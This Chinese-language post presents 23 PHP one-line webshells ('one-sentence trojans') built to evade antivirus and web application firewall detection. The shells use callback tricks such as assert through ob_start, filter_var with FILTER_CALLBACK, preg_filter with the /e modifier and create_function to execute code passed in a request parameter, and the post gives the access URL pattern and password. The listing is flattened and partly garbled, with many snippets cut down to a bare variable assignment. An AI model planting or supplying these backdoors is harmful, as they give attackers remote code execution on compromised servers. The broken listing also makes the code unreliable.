最新型23个免杀过狗一句话木马
分享些不需要动态函数、不用eval、不含敏感函数、免杀免拦截的一句话。(少部分一句话需要php5.4.8+、或sqlite/pdo/yaml/memcached扩展等)
原理:https://www.leavesongs.com/PENETRATION/php-callback-backdoor.html
所有一句话使用方法基本都是:
http:// target/shell.php?e=assert 密码pass
以下是代码片段:
01 02 $e = $_REQUEST[‘e’]; 03 $e = $_REQUEST[‘e’]; 04 $e = $_REQUEST[‘e’]; 05 $arr = new ArrayObject(array(‘test’, $_REQUEST[‘pass’])); 06 $arr = new ArrayObject(array(‘test’ => 1, $_REQUEST[‘pass’] => 2)); 07 $e = $_REQUEST[‘e’]; 08 $e = $_REQUEST[‘e’]; 09 $e = $_REQUEST[‘e’]; 10 $e = $_REQUEST[‘e’]; 11 mb_ereg_replace(‘.*’, $_REQUEST[‘pass’], ”, ‘e’); 12 echo preg_filter(‘|.*|e’, $_REQUEST[‘pass’], ”); 13 ob_start(‘assert’); 14 $e = $_REQUEST[‘e’]; 15 $e = $_REQUEST[‘e’]; 16 filter_var($_REQUEST[‘pass’], FILTER_CALLBACK, array(‘options’ => ‘assert’)); 17 filter_var_array(array(‘test’ => $_REQUEST[‘pass’]), array(‘test’ => array(‘filter’ => FILTER_CALLBACK, ‘options’ => ‘assert’))); 18 $e = $_REQUEST[‘e’]; 19 $e = $_REQUEST[‘e’]; 20 $str = urlencode($_REQUEST[‘pass’]); 21 $mem = new Memcache(); 22 preg_replace_callback(‘/.+/i’, create_function(‘$arr’, ‘return assert($arr[0]);’), $_REQUEST[‘pass’]); 23 mb_ereg_replace_callback(‘.+’, create_function(‘$arr’, ‘return assert($arr[0]);’), $_REQUEST[‘pass’]); |